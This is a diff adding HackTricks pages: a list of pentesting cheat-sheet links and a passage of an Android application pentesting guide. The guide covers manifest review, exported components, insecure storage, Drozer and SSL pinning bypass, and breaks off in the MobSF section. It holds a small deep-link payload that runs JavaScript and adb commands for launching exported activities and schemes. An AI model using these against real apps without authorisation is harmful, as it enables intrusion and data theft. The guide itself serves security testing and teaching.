+    m = re.search('MYREGEXP(.*?)MYREGEXP2', page, re.DOTALL)
+    if m:
+        return m.group(1)
+    else:
+        return 1
+    
+
+term = Terminal()
+term.cmdloop()
+```
+
diff --git a/misc/references.md b/misc/references.md
new file mode 100644
index 00000000..e89101dc
--- /dev/null
+++ b/misc/references.md
@@ -0,0 +1,26 @@
+# Other Big References
+
+{% embed url="https://highon.coffee/blog/penetration-testing-tools-cheat-sheet/\#python-tty-shell-trick" %}
+
+{% embed url="https://rmusser.net/docs/Privilege%20Escalation%20&%20Post-Exploitation.html" %}
+
+{% embed url="https://hausec.com/pentesting-cheatsheet/\#\_Toc475368982" %}
+
+{% embed url="https://anhtai.me/pentesting-cheatsheet/" %}
+
+{% embed url="https://bitvijays.github.io/LFF-IPS-P2-VulnerabilityAnalysis.html" %}
+
+{% embed url="https://ired.team/offensive-security-experiments/offensive-security-cheetsheets" %}
+
+{% embed url="http://www.lifeoverpentest.com/2018/02/enumeration-cheat-sheet-for-windows.html" %}
+
+{% embed url="https://chryzsh.gitbooks.io/pentestbook/basics\_of\_windows.html" %}
+
+{% embed url="http://www.0daysecurity.com/penetration-testing/enumeration.html" %}
+
+{% embed url="https://github.com/wwong99/pentest-notes/blob/master/oscp\_resources/OSCP-Survival-Guide.md" %}
+
+{% embed url="https://anhtai.me/oscp-fun-guide/" %}
+
+
+
diff --git a/mobile-apps-pentesting/android-app-pentesting/README.md b/mobile-apps-pentesting/android-app-pentesting/README.md
new file mode 100644
index 00000000..57646cce
--- /dev/null
+++ b/mobile-apps-pentesting/android-app-pentesting/README.md
@@ -0,0 +1,722 @@
+# Android Applications Pentesting
+
+If you want to **know** about my **latest modifications**/**additions or you have any suggestion for HackTricks or PEASS**, **join the** [**PEASS & HackTricks telegram group here**](https://t.me/peass)**.**
+
+## Android Application Fundamentals <a id="2-android-application-fundamentals"></a>
+
+This introduction is taken from [https://maddiestone.github.io/AndroidAppRE/app\_fundamentals.html](https://maddiestone.github.io/AndroidAppRE/app_fundamentals.html)
+
+### Fundamentals Review <a id="fundamentals-review"></a>
+
+* Android applications are in the _APK file format_. APK is basically a ZIP file. \(You can rename the file extension to .zip and use unzip to open and see its contents.\)
+* APK Contents \(Not exhaustive\)
+  * AndroidManifest.xml
+  * META-INF/
+    * Certificate lives here!
+  * classes.dex
+    * Dalvik bytecode for application in the DEX file format. This is the Java \(or Kotlin\) code that the application will run by default.
+  * lib/
+    * Native libraries for the application, by default, live here! Under the lib/ directory, there are the cpu-specific directories.
+      * `armeabi`: compiled code for all ARM based processors only
+      * `armeabi-v7a`: compiled code for all ARMv7 and above based processors only
+      * `x86`: compiled code for X86
+      * `mips`: compiled code for MIPS processors only
+  * assets/
+    * Any other files that may be needed by the app.
+    * Additional native libraries or DEX files may be included here. This can happen especially when malware authors want to try and “hide” additional code, native or Dalvik, by not including it in the default locations.
+  *  res/
+    * the directory containing resources not compiled into resources.arsc
+  * classes.dex: The classes compiled in the dex file format understandable by the Dalvik virtual machine
+  * resources.arsc: a file containing precompiled resources, such as binary XML for example.
+
+### Dalvik & Smali <a id="dalvik--smali"></a>
+
+Most Android applications are written in Java. Kotlin is also supported and interoperable with Java. For ease, for the rest of this workshop, when I refer to “Java”, you can assume that I mean “Java or Kotlin”. Instead of the Java code being run in Java Virtual Machine \(JVM\) like desktop applications, in Android, the Java is compiled to the _Dalvik Executable \(DEX\) bytecode_ format. For earlier versions of Android, the bytecode was translated by the Dalvik virtual machine. For more recent versions of Android, the Android Runtime \(ART\) is used.  
+If developers, write in Java and the code is compiled to DEX bytecode, to reverse engineer, we work the opposite direction.  
+![Flowchart of Developer&apos;s process. Java to DEX bytecode](https://maddiestone.github.io/AndroidAppRE/images/DevelopersFlow.jpg)  
+![Flowchart of Reverse Engineer&apos;s process. DEX bytecode to SMALI to Decompiled Java](https://maddiestone.github.io/AndroidAppRE/images/ReversersFlow.jpg)
+
+Smali is the human readable version of Dalvik bytecode. Technically, Smali and baksmali are the name of the tools \(assembler and disassembler, respectively\), but in Android, we often use the term “Smali” to refer to instructions. If you’ve done reverse engineering or computer architecture on compiled C/C++ code. SMALI is like the assembly language: between the higher level source code and the bytecode.
+
+### Application Entry Points <a id="application-entry-points"></a>
+
+One of the most important points of reverse engineering is knowing where to begin your analysis and entry points for code execution is an important part of that.
+
+#### Launcher Activity and other activities <a id="launcher-activity"></a>
+
+An **Android activity** is one screen of the **Android** app's user interface. In that way an **Android activity** is very similar to windows in a desktop application. An **Android** app may contain one or more activities, meaning one or more screens.
+
+The launcher activity is what most people think of as the entry point to an Android application. The launcher activity is the activity that is started when a user clicks on the icon for an application. You can determine the launcher activity by looking at the application’s manifest. The launcher activity will have the following MAIN and LAUNCHER intents listed.
+
+Keep in mind that not every application will have a launcher activity, especially apps without a UI. Examples of applications without a UI \(and thus a launcher activity\) are pre-installed applications that perform services in the background, such as voicemail.
+
+```markup
+<activity android:name=".LauncherActivity">
+	<intent-filter>
+    	<action android:name="android.intent.action.MAIN" />
+        <category android:name="android.intent.category.LAUNCHER" />
+    </intent-filter>
+</activity>
+```
+
+Activities can be exported allowing other processes on the device to launch the activity. By default, they aren't exported but you can export them setting:
+
+```markup
+<service android:name=".ExampleExportedService" android:exported="true"/>
+```
+
+#### URL schemes
+
+An application can declare an **URL schema** inside and activity so every time the Android device try to **access an address using that schema** the applications activity will be called: 
+
+![](../../.gitbook/assets/image%20%28141%29.png)
+
+In this case the scheme in `myapp://`
+
+If inside the `intent-filter`you find something like this:
+
+![](../../.gitbook/assets/image%20%28150%29.png)
+
+Then, it's expecting something like `http://www.example.com/gizmos`
+
+ If you find something like this:
+
+![](../../.gitbook/assets/image%20%28242%29.png)
+
+It will mean that it's expecting a URL starting by `example://gizmos`  
+In this case you could try to abuse the functionality creating a web with the following payloads. It will try to navigate to arbitrary pages and try to execute JS:
+
+```markup
+<a href="example://gizmos/https://google.com">click here</a>
+<a href="example://gizmos/javascript://%250dalert(1)">click here</a>
+```
+
+#### Content Provider <a id="services"></a>
+
+* Content Provider component supplies data from one application to others on request.
+* You can store the data in the file system, an SQLite database, on the web, or any other persistent storage location your app can access.
+* Through the content provider, other apps can query or even modify the data \(if the content provider allows it\).
+* Content Provider is useful in cases when an app want to share data with another app.
+* It is much similar like databases and has four methods.
+  * insert\(\)
+  * update\(\)
+  * delete\(\)
+  * query\(\)
+
+#### FileProvider
+
+This is a type of Content Provider that will **share files** from a folder. You can declare a file provider like this:
+
+```markup
+<provider android:name="androidx.core.content.FileProvider"
+            android:authorities="com.example.myapp.fileprovider"
+            android:grantUriPermissions="true" android:exported="false">
+            <meta-data
+                android:name="android.support.FILE_PROVIDER_PATHS"
+                android:resource="@xml/filepaths" />
+</provider>
+```
+
+Note the **`android:exported`** attribute because if it's **`true`** external applications will be able to access the shared folders.  
+Note that the configuration `android:resource="@xml/filepaths"` is indicating that the file _res/xml/filepaths.xml_ contains the configuration of **which folders** this **FileProvider** is going to **share**. This is an example of how to indicate to share a folder in that file:
+
+```markup
+<paths>
+    <files-path path="images/" name="myimages" />
+</paths>
+```
+
+Sharing something like **`path="."`** could be **dangerous** even if the provider isn't exported if there is other vulnerability in some part of the code that tried to access this provider.  
+You could **access** an **image** inside that folder with `content://com.example.myapp.fileprovider/myimages/default_image.jpg`asd  
+[More information about FileProviders here](https://developer.android.com/training/secure-file-sharing/setup-sharing).
+
+#### Services <a id="services"></a>
+
+[Services](https://developer.android.com/guide/components/services) run in the background without a UI. There is a myriad of ways that they can be started and thus are an entry point for applications. The default way that a service can be started as an entry point to an application is through [Intents](https://developer.android.com/guide/components/intents-filters).
+
+When the `startService` API is called to start a Service, the `onStart` method in the Service is executed.
+
+For example, a service might play music in the background while the user is in a different application, or it might fetch data over the network without blocking user interaction with an activity.
+
+A service can be exported which allows other processes on the device to start the service. By default services aren't exported but it can be configured in the Manifest:
+
+```markup
+<service android:name=".ExampleExportedService" android:exported="true"/>
+```
+
+#### Broadcast Receivers <a id="broadcast-receivers"></a>
+
+Broadcasts can be thought of a messaging system and [broadcast receivers](https://developer.android.com/guide/components/broadcasts#receiving-broadcasts) are the listeners. If an application has registered a receiver for a specific broadcast, the code in that receiver is executed when the system sends the broadcast. There are 2 ways that an app can register a receiver: in the app’s Manifest or dynamically registered in the app’s code using the `registerReceiver()` API call.
+
+In both cases, to register the receiver, the intent filters for the receiver are set. These intent filters are the broadcasts that should trigger the receiver.
+
+When the specific broadcasts are sent that the receiver is registered for are sent, `onReceive` in the BroadcastReceiver class is executed.
+
+An application may register a receiver for the low battery message for example, and change its behavior based on that information.
+
+#### Application Subclass <a id="application-subclass"></a>
+
+Android applications can define a subclass of [Application](https://developer.android.com/reference/android/app/Application). Applications can, but do not have to define a custom subclass of Application. If an Android app defines a Application subclass, this class is instantiated prior to any other class in the application.
+
+If the `attachBaseContext` method is defined in the Application subclass, it is called first, before the `onCreate` method.
+
+#### Intents
+
+Intent is basically a message that is passed between components \(such as Activities, Services, Broadcast Receivers, and Content Providers\).  
+To be simple Intent can be used:
+
+* To start an Activity, typically opening a user interface for an app
+* As broadcasts to inform the system and apps of changes
+* To start, stop, and communicate with a background service
+* To access data via ContentProviders
+* As callbacks to handle events
+
+Improper implementation could result in data leakage, restricted functions being called and program flow being manipulated.  
+[**Learn more about intents reading here.**](what-are-intents.md)\*\*\*\*
+
+#### Intent Filter
+
+An IntentFilters specifies the types of Intent that an activity, service, or Broadcast Receiver can respond to. An Intent Filter declares the capabilities of a component. It specifies what an activity or service can do and what types of broadcasts a Receiver can handle. It allows the corresponding component to receive Intents of the declared type. IntentFilters are typically defined via the AndroidManifest.xml file. For BroadcastReceiver it is also possible to define them in coding. An IntentFilters is defined by its category, action and data filters. It can also contain additional metadata.
+
+If any of the component is public then it can be accessed from another application installed on the same device. In Android a activity/services/content provider/broadcast receiver is **public** when exported is set to true but a component is also public if the **manifest specifies an Intent filter** for it. However,  
+developers can **explicitly make components private** \(regardless of any intent filters\)  
+by setting the **“exported” attribute to false** for each component in the manifest file.  
+Developers can also set the “permission” attribute to require a certain permission to access each component, thereby restricting access to the component.
+
+### Other App components
+
+**Application Signing**
+
+* Android requires that all apps be digitally signed with a certificate before they can be installed. Android uses this certificate to identify the author of an app.
+* To run application on the device ,it should be signed.When application is installed on to an device then package manager verifies that whether the application has been properly signed with the certificate in the apk file or not.
+* Application can be self signed or can be signed through CA.
+* Application signing ensures that one application can’t access any other application except through well-defined IPC and also that it is passed unmodified to the device.
+
+**Application Verification**
+
+* Android 4.2 and later support application verification. Users can choose to enable “Verify Apps” and have applications evaluated by an application verifier prior to installation.
+* App verification can alert the user if they try to install an app that might be harmful; if an application is especially bad, it can block installation.
+
+**Android Sandbox**
+
+Once installed on a device, each Android app lives in its own security sandbox: – The Android operating system is a multi-user Linux system in which each app is a different user.
+
+* By default, the system assigns each app a unique Linux user ID \(the ID is used only by the system and is unknown to the app\). The system sets permissions for all the files in an app so that only the user ID assigned to that app can access them.
+* Each process has its own virtual machine \(VM\), so an app’s code runs in isolation from other apps.
+* By default, every app runs in its own Linux process. Android starts the process when any of the app’s components need to be executed, then shuts down the process when it’s no longer needed or when the system must recover memory for other apps.
+
+## ADB \(Android Debug Bridge\)
+
+This is the main tool you need to connect to an android device \(emulated or physical\).  
+It allows you to control your device over **USB** or **Network** from a computer, **copy** files back and forth, **install** and uninstall apps, run **shell** commands, perform **backups**, read **logs** and more.
+
+Take a look to the following list of [**ADB Commands**](adb-commands.md) ****to learn how to use adb.
+
+## Smali
+
+Sometimes it is interesting to **modify the application code** to access **hidden information** \(maybe well obfuscated passwords or flags\). Then, it could be interesting to decompile the apk, modify the code and recompile it.  
+[**In this tutorial** you can **learn how to decompile and APK, modify Smali code and recompile the APK** with the new functionality](smali-changes.md). This could be very useful as an **alternative for several tests during the dynamic analysis** that are going to presented. Then, **keep always in mid this possibility**.
+
+## Other interesting tricks
+
+* [Spoofing your location in Play Store](spoofing-your-location-in-play-store.md)
+* **Download APKs**: [https://apps.evozi.com/apk-downloader/](https://apps.evozi.com/apk-downloader/), [https://apkpure.com/es/](https://apkpure.com/es/), [https://www.apkmirror.com/](https://www.apkmirror.com/), [https://apkcombo.com/es-es/apk-downloader/](https://apkcombo.com/es-es/apk-downloader/)
+
+## Static Analysis
+
+First of all, for analysing an APK you should **take a look to the to the Java code** using a decompiler.  
+Please, [**read here to find information about different available decompilers**](apk-decompilers.md).
+
+### Looking for interesting Info
+
+Just taking a look to the **strings** of the APK you can search for **passwords**, **URLs** \([https://github.com/ndelphit/apkurlgrep](https://github.com/ndelphit/apkurlgrep)\), **api** keys, **encryption**, **bluetooth uuids**, **tokens** and anything interesting... look even for code execution **backdoors** or authentication backdoors \(hardcoded admin credentials to the app\).
+
+#### Firebase
+
+Pay special attention to **firebase URLs** and check if it is bad configured. [More information about whats is FIrebase and how to exploit it here.](../../pentesting/pentesting-web/buckets/firebase-database.md)
+
+### Basic understanding of the application - Manifest.xml
+
+Using any of the **decompilers** mentioned [**here** ](apk-decompilers.md)you will be able to read the _Manifest.xml_. You could also **rename** the **apk** file extension **to .zip** and **unzip** it.  
+Reading the **manifest** you can find **vulnerabilities**:
+
+* First of all, check if **the application is debuggeable**. A production APK shouldn't be \(or others will be able to connect to it\). You can check if an application is debbugeable looking in the manifest for the attribute `debuggable="true"` inside the tag _&lt;application_   Example: `<application theme="@2131296387" debuggable="true"`
+  * [Learn here](drozer-tutorial/#is-debuggeable) how to find debuggeable applications in a phone and exploit them
+* **Backup**:  The **`android:allowBackup`** attribute defines whether application data can be backed up and restored by a user who has enabled usb debugging. If backup flag is set to true, it allows an attacker to take the backup of the application data via adb even if the device is not rooted. Therefore applications that handle and store sensitive information such as card details, passwords etc. should have this setting explicitly set to **false** because by default it is set to **true** to prevent such risks.
+  * `<application android:allowBackup="false"`
+* **NetworkSecurity:** The application network security can be overwritten the defaults values with **`android:networkSecurityConfig="@xml/network_security_config"`**. A file with that name may be put in _**res/xml.**_ This file will configure important security settings like certificate pins or if it allows HTTP traffic. You can read here more information about all the things that can be configure, but check this example about how to configure HTTP traffic for some domains: 
+  *  `<domain-config cleartextTrafficPermitted="true"> <domain includeSubdomains="true">formation-software.co.uk </domain></domain-config>`
+* **Exported activities**: Check for exported activities inside the manifest as this could be dangerous. Later in the dynamic analysis it will be explained how [you can abuse this behaviour](./#exploiting-exported-activities-authorisation-bypass).
+* **Content Providers**: If a exported provider is being exposed, you could b able to access/modify interesting information. In dynamic analysis [you will learn how to abuse them](./#exploiting-content-providers-accessing-and-manipulating-sensitive-information).
+  * Check for **FileProviders** configurations inside the attribute `android:name="android.support.FILE_PROVIDER_PATHS"`. [Read here to learn more about FileProviders](./#fileprovider).
+* **Exposed Services**: Depending on what the service is doing internally vulnerabilities could be exploited. In dynamic analysis [you will learn how to abuse them](./#exploiting-services).
+* **Broadcast Receivers**: [You will learn how you can possibly exploit them](./#exploiting-broadcast-receivers) during the dynamic analysis.
+* **URL scheme**: Read the code of the activity managing the schema and look for vulnerabilities managing the input of the user. More info about [what is an URL scheme here](./#url-schemes).
+
+### Insecure data storage
+
+#### Internal Storage
+
+Files **created** on **internal** storage are **accessible** only by the **app**. This protection is implemented by Android and is sufficient for most applications. But developers often use `MODE_WORLD_READBALE` & `MODE_WORLD_WRITABLE` to give access to those files to a different application, but this doesn’t limit other apps\(malicious\) from accessing them.  
+During the **static** analysis **check** for the use of those **modes**, during the **dynamic** analysis **check** the **permissions** of the files created \(maybe some of them are worldwide readable/writable\).  
+[More information about this vulnerability and how to fix it here.](https://manifestsecurity.com/android-application-security-part-8/)
+
+#### External Storage
+
+Files created on **external storage**, such as SD Cards, are **globally readable and writable**. Because external storage can be removed by the user and also modified by any application, you should **not store sensitive information using external storage**.  
+As with data from any untrusted source, you should **perform input validation** when handling **data from external storage**. We strongly recommend that you not store executables or class files on external storage prior to dynamic loading. If your app does retrieve executable files from external storage, the files should be signed and cryptographically verified prior to dynamic loading.  
+Info taken from [here](https://manifestsecurity.com/android-application-security-part-8/).
+
+External storage can be **accessed** in `/storage/emulated/0`
+
+### Broken Cryptography
+
+#### Poor Key Management Processes <a id="poorkeymanagementprocesses"></a>
+
+Some developers save sensitive data in the local storage and encrypt it with a key hardcoded/predictable in the code. This shouldn't be done as some reversing could allow attackers to extract the confidential information.
+
+#### Use of Insecure and/or Deprecated Algorithms <a id="useofinsecureandordeprecatedalgorithms"></a>
+
+Developers shouldn't use **deprecated algorithms** to perform authorisation **checks**, **store** or **send** data. Some of these algorithms are: RC4, MD4, MD5, SHA1... If **hashes** are used to store passwords for example, hashes brute-force **resistant** should be used with salt.
+
+### Other checks
+
+* It's recommended to **obfuscate the APK** to difficult the reverse engineer labour to attackers.
+* If the app is sensitive \(like bank apps\), it should perform it's **own checks to see if the mobile is rooted** and act in consequence.
+* If the app is sensitive \(like bank apps\), it should check if an **emulator** is being used.
+* If the app is sensitive \(like bank apps\), it should **check it's own integrity before executing** it to check if it was modified.
+
+### Other interesting functions
+
+* **Code execution**: `Runtime.exec(), ProcessBuilder(), native code:system()` 
+* **Send SMSs**: `sendTextMessage, sendMultipartTestMessage`
+* **Native functions** declared as `native`: `public native, System.loadLibrary, System.load`
+  * [Read this to learn **how to reverse native functions**](reversing-native-libraries.md)\*\*\*\*
+
+ 
+
+## Dynamic Analysis
+
+> First of all, you need an environment where you can install the application and all the environment \(Burp CA cert, Drozer and Frida mainly\). Therefore, a rooted device \(emulated or not\) is extremely recommended.
+
+### Online Dynamic analysis
+
+You can create a **free account** in: [https://appetize.io/](https://appetize.io/). This platform allows you to **upload** and **execute** APKs, so it is useful to see how an apk is behaving.
+
+You can even **see the logs of your application** in the web and connect through **adb**.
+
+![](../../.gitbook/assets/image%20%2823%29.png)
+
+Thanks to the ADB connection you can use **Drozer** and **Frida** inside the emulators.
+
+### Local Dynamic Analysis
+
+You can use some **emulator** like: 
+
+* \*\*\*\*[**Genymotion**](https://www.genymotion.com/fun-zone/) ****\(_Free version: **Personal Edition**, you need to **create** an **account**._\)
+* \*\*\*\*[**Android Studio**](https://developer.android.com/studio) **\(**You can create x86 and **arm** devices, and according to [**this** ](https://android-developers.googleblog.com/2020/03/run-arm-apps-on-android-emulator.html)**latest x86** versions **support ARM libraries** without needing an slow arm emulator\). 
+  * If you want to try to **install** an **image** and then you want to **delete it** you can do that on Windows:`C:\Users\<User>\AppData\Local\Android\sdk\system-images\` or Mac: `/Users/myeongsic/Library/Android/sdk/system-image` 
+* \*\*\*\*[Nox](https://es.bignox.com/) \(Free, but it doesn't support Frida or Drozer\).
+
+{% hint style="info" %}
+When creating a new emulator on any platform remember that the bigger the screen is, the slower the emulator will run. So select small screens if possible.
+{% endhint %}
+
+As most people will use **Genymotion**, note this trick. To **install google services** \(like AppStore\) you need to click on the red marked button of the following image:
+
+![](../../.gitbook/assets/image%20%28100%29.png)
+
+Also,  notice that in the **configuration of the Android VM in Genymotion** you can select **Bridge Network mode** \(this will be useful if you will be connecting to the Android VM from a different VM with the tools\).
+
+Or you could use a **physical** **device** \(you need to activate the debugging options and it will be cool if you can root it\):
+
+1. **Settings**.
+2. \(FromAndroid 8.0\) Select **System**.
+3. Select **About phone**.
+4. Press **Build number** 7 times.
+5. Go back and you will find the **Developer options**.
+
+
+
+> Once you have installed the application, the first thing you should do is to  try it and investigate what does it do, how does it work and get comfortable with it.  
+> I will suggest to **perform this initial dynamic analysis using MobSF dynamic analysis + pidcat**, so will will be able to **learn how the application works** while MobSF **capture** a lot of **interesting** **data** you can review later on.
+
+### Unintended Data Leakage
+
+#### Logging 
+
+Often Developers leave debugging information publicly. So any application with `READ_LOGS` permission can **access those logs** and can gain sensitive information through that.  
+While navigating through the application use [**pidcat**](https://github.com/JakeWharton/pidcat)_\(Recommended, it's easier to use and read_\) or [adb logcat](adb-commands.md#logcat) to read the created logs and **look for sensitive information**.
+
+**Copy/Paste Buffer Caching**
+
+Android provides **clipboard-based** framework to provide copy-paste function in android applications. But this creates serious issue when some **other application** can **access** the **clipboard** which contain some sensitive data. **Copy/Paste** function should be **disabled** for **sensitive part** of the application. For example, disable copying credit card details.
+
+#### Crash Logs <a id="crashlogs"></a>
+
+If an application **crashes** during runtime and it **saves logs** somewhere then those logs can be of help to an attacker especially in cases when android application cannot be reverse engineered. Then, avoid creating logs when applications crashes and if logs are sent over the network then ensure that they are sent over an SSL channel.  
+As pentester, **try to take a look to these logs**.
+
+#### Analytics Data Sent To 3rd Parties <a id="analyticsdatasentto3rdparties"></a>
+
+Most of the application uses other services in their application like Google Adsense but sometimes they **leak some sensitive data** or the data which is not required to sent to that service. This may happen because of the developer not implementing feature properly. You can **look by intercepting the traffic** of the application and see whether any sensitive data is sent to 3rd parties or not.
+
+### SQLite DBs
+
+Most of the applications will use **internal SQLite databases** to save information. During the pentest take a **look** to the **databases** created, the names of **tables** and **columns** and all the **data** saved because you could find **sensitive information** \(which would be a vulnerability\).  
+Databases should be located in `/data/data/the.package.name/databases` like `/data/data/com.mwr.example.sieve/databases`
+
+If the database is saving confidential information and is **encrypted b**ut you can **find** the **password** inside the application it's still a **vulnerability**.
+
+Enumerate the tables using `.tables` and enumerate the columns of the tables doing `.schema <table_name>`
+
+### Drozer \(Exploit Activities, Content Providers and Services\)
+
+**Drozer** allows you to **assume the role of an Android app** and interact with other apps. It can do **anything that an installed application can do**, such as make use of Android’s Inter-Process Communication \(IPC\) mechanism and interact with the underlying operating system. From [Drozer Guide](https://labs.mwrinfosecurity.com/assets/BlogFiles/mwri-drozer-user-guide-2015-03-23.pdf).  
+Drozer is s useful tool to **exploit exported activities, exported services and Content Providers** as you will learn in the following sections.
+
+### Exploiting exported Activities - Authorisation bypass
+
+[Read this if you want to remind what is an Android Activity.](./#launcher-activity)  
+When an Activity is exported you can invoke its screen from an external app. Therefore, if an activity with **sensitive information** is **exported** you could **bypass** the **authentication** mechanisms **to access it.**  
+[**Learn how to exploit exported activities with Drozer.**](drozer-tutorial/#activities)\*\*\*\*
+
+You can also start an exported activity from adb:
+
+* PackageName is com.example.demo
+* Exported ActivityName is com.example.test.MainActivity
+
+```text
+adb shell am start -n com.example.demo/com.example.test.MainActivity
+```
+
+**NOTE**: MobSF will detect as malicious the use of _**singleTask/singleInstance**_ as `android:launchMode` in an activity, but due to [this](https://github.com/MobSF/Mobile-Security-Framework-MobSF/pull/750), apparently this is only dangerous on old versions \(API versions &lt; 21\).
+
+### Exploiting Content Providers - Accessing and manipulating sensitive information
+
+[Read this if you want to remind what is a Content Provider.](./#services)  
+Content providers are basically used to **share data**. If an app has available content providers you may be able to **extract sensitive** data from them. It also interesting to test possible **SQL injections** and **Path Traversals** as they could be vulnerable.  
+[**Learn how to exploit Content Providers with Drozer.**](drozer-tutorial/#content-providers)\*\*\*\*
+
+### **Exploiting Services**
+
+[Read this if you want to remind what is a Service.](./#services-1)  
+As service is basically something that **can receive data**, **process** it and **returns** \(or not\) a response. Then, if an application is exporting some services you should **check** the **code** to understand what is it doing and **test** it **dynamically** for extracting confidential info, bypassing authentication measures...   
+[**Learn how to exploit Services with Drozer.**](drozer-tutorial/#services)\*\*\*\*
+
+### **Exploiting Broadcast Receivers**
+
+\*\*\*\*[Read this if you want to remind what is a Broadcast Receiver.](./#broadcast-receivers)  
+A broadcast receiver will be waiting for a type of message. Depending on ho the receiver handles the message it could be vulnerable.  
+[**Learn how to exploit Broadcast Receivers with Drozer.**](./#exploiting-broadcast-receivers)
+
+### **Exploiting Schemes**
+
+You can **open** a declared **scheme** using **adb** or a **browser**:
+
+```bash
+adb shell am start -a android.intent.action.VIEW -d "scheme://hostname/path?param=value" [your.package.name]
+```
+
+_Note that you can **omit the package name** and the mobile will automatically call the app that should open that link._
+
+```markup
+<!-- Browser regular link -->
+<a href="scheme://hostname/path?param=value">Click me</a>
+<!-- fallback in your url you could try the intent url -->
+<a href="intent://hostname#Intent;scheme=scheme;package=your.package.name;S.browser_fallback_url=http%3A%2F%2Fwww.example.com;end">with alternative</a>
+```
+
+### Insufficient Transport Layer Protection
+
+* **Lack of Certificate Inspection:** Android Application fails to verify the identity of the certificate presented to it. Most of the application ignore the warnings and accept any self-signed certificate presented. Some Application instead pass the traffic through an HTTP connection.
+* **Weak Handshake Negotiation:** Application and server perform an SSL/TLS handshake but use an insecure cipher suite which is vulnerable to MITM attacks. So any attacker can easily decrypt that connection.
+* **Privacy Information Leakage:** Most of the times it happens that Applications do authentication through a secure channel but rest all connection through non-secure channel. That doesn’t add to security of application because rest sensitive data like session cookie or user data can be intercepted by an malicious user.
+
+From the 3 scenarios presented we are going to discuss **how to verify the identity of the certificate**. The other 2 scenarios depends on the **TLS configuratio**n of the server and if the **application sends unencrypted data**. The pentester should check by it's own the TLS configuration of the server \([here](../../pentesting/pentesting-web/#ssl-tls-vulnerabilites)\) and detect if any **confidential information is sent by an unencrypted/vulnerable** channel .  
+More information about how to discover and fix these kind of vulnerabilities [**here**](https://manifestsecurity.com/android-application-security-part-10/).
+
+#### SSL Pinning
+
+By default, when making an SSL connection, the client\(android app\) checks that the server’s certificate has a verifiable chain of trust back to a trusted \(root\) certificate and matches the requested hostname. This lead to problem of **Man in the Middle Attacks\(MITM\)**.  
+In certificate Pinnning, an Android Application itself contains the certificate of server and only transmit data if the same certificate is presented.  
+It's recommended to **apply SSL Pinning** for the sites where sensitive information is going to be sent.
+
+### Inspecting HTTP traffic
+
+First of all, you should \(must\) **install the certificate** of the **proxy** tool that you are going to use, probably Burp. If you don't install the CA certificate of the proxy tool, you probably aren't going to see the encrypted traffic in the proxy.  
+**Please,** [**read this guide to learn how to do install a custom CA certificate**](android-burp-suite-settings.md)**.**
+
+#### SSL Pinning
+
+We have already discuss what is SSL Pinning just 2 paragraphs before. When it's implemented in an application you will need to bypass it to inspect the HTTPS traffic or you won't see it.  
+Here I'm going to present a few options I've used to bypass this protection:
+
+* Automatically **modify** the **apk** to **bypass** SSLPinning with [**apk-mitm**](https://github.com/shroudedcode/apk-mitm). The best pro of this option, is that you won't need root to bypass the SSL Pinning, but you will need to delete the application and reinstall the new one, and this won't always work.
+* You could use **Frida** \(discussed below\) to bypass this protection. Here you have a guide to use Burp+Frida+Genymotion: [https://spenkk.github.io/bugbounty/Configuring-Frida-with-Burp-and-GenyMotion-to-bypass-SSL-Pinning/](https://spenkk.github.io/bugbounty/Configuring-Frida-with-Burp-and-GenyMotion-to-bypass-SSL-Pinning/)
+
+#### Common Web vulnerabilities
+
+Note that in this step you should look for common web vulnerabilities. A lot of information about web vulnerabilities be found in this book so I'm not going to mention them here.
+
+### Frida
+
+Dynamic instrumentation toolkit for developers, reverse-engineers, and security researchers. Learn more at [www.frida.re](https://www.frida.re/).  
+**It's amazing, you can access running application and hook methods on run time to change the behaviour, change values, extract values, run different code...  
+If you want to pentest Android applications you need to know how to use Frida.**
+
+**Learn how to use Frida:** [**Frida tutorial**](frida-tutorial/)  
+**Some "GUI" for actions with Frida:** [**https://github.com/m0bilesecurity/RMS-Runtime-Mobile-Security**](https://github.com/m0bilesecurity/RMS-Runtime-Mobile-Security)  
+**Some other abstractions based on Frida:** [**https://github.com/sensepost/objection**](https://github.com/sensepost/objection) **,** [**https://github.com/dpnishant/appmon**](https://github.com/dpnishant/appmon)  
+**You can find some Awesome Frida scripts here:** [**https://codeshare.frida.re/**](https://codeshare.frida.re/)\*\*\*\*
+
+### **Android Application Analyzer**
+
+This tool could help you  managing different tools during the dynamic analysis: [https://github.com/NotSoSecure/android\_application\_analyzer](https://github.com/NotSoSecure/android_application_analyzer)
+
+### Android Client Side Injections and others
+
+Probably you know about this kind of vulnerabilities from the Web. You have to be specially careful with this vulnerabilities in an Android application:
+
+* **SQL Injection:** When dealing with dynamic queries or Content-Providers ensure you are using parameterized queries.
+* **JavaScript Injection \(XSS\):** Verify that JavaScript and Plugin support is disabled for any WebViews \(disabled by default\). [More info here](webview-attacks.md#javascript-enabled).
+* **Local File Inclusion:** Verify that File System Access is disabled for any WebViews \(enabled by default\) `(webview.getSettings().setAllowFileAccess(false);)`. [More info here](webview-attacks.md#javascript-enabled).
+* **Intent Injection/Fuzzing:** Verify actions and data are validated via an Intent Filter for all Activities.
+* **Eternal cookies**: In several cases when the android application finish the session the cookie isn't revoked or it could be even saved to disk
+* \*\*\*\*[**Secure Flag** in cookies](../../pentesting-web/hacking-with-cookies.md#cookies-flags)
+
+## Automatic Analysis
+
+### [MobSF](https://github.com/MobSF/Mobile-Security-Framework-MobSF)
+
+#### Static analysis
+
+![](../../.gitbook/assets/image%20%2859%29.png)
+
+**Vulnerability assessment of the application** using a nice web-based frontend. You can also perform dynamic analysis \(but you need to prepare the environment\).
+
+```text
+docker pull opensecurity/mobile-security-framework-mobsf
+docker run -it -p 8000:8000 opensecurity/mobile-security-framework-mobsf:latest
+```
+
+Notice that MobSF can analyse **Andoid**\(apk\)**, IOS**\(ipa\) **and Windows**\(apx\) applications \(_Windows applications must be analyzed from a MobSF installed in a Windows host_\).  
+Also, if you create a **ZIP** file with the source code if an **Android** or an **IOS** app \(go to the root folder of the application, select everything and create a ZIPfile\), it will be able to analyse it also.
+
+MobSF also allows you to **diff/Compare** analysis and to integrate **VirusTotal** \(you will need to set your API key in _MobSF/settings.py_ and enable it: `VT_ENABLED = TRUE`  `VT_API_KEY = <Your API key>`  `VT_UPLOAD = TRUE`\). You can also set `VT_UPLOAD` to `False`, then the **hash** will be **upload** instead of the file.
+
+### Dynamic analysis with MobSF
+
+**MobSF** can also be very helpful for **dynamic analysis** in **Android**, but in that case you will need to install MobSF and **genymotion** in your host \(a VM or Docker won't work\). _Note: You need to **start first a VM in genymotion** and **then MobSF.**_  
+The **MobSF dynamic analyser** can:
+
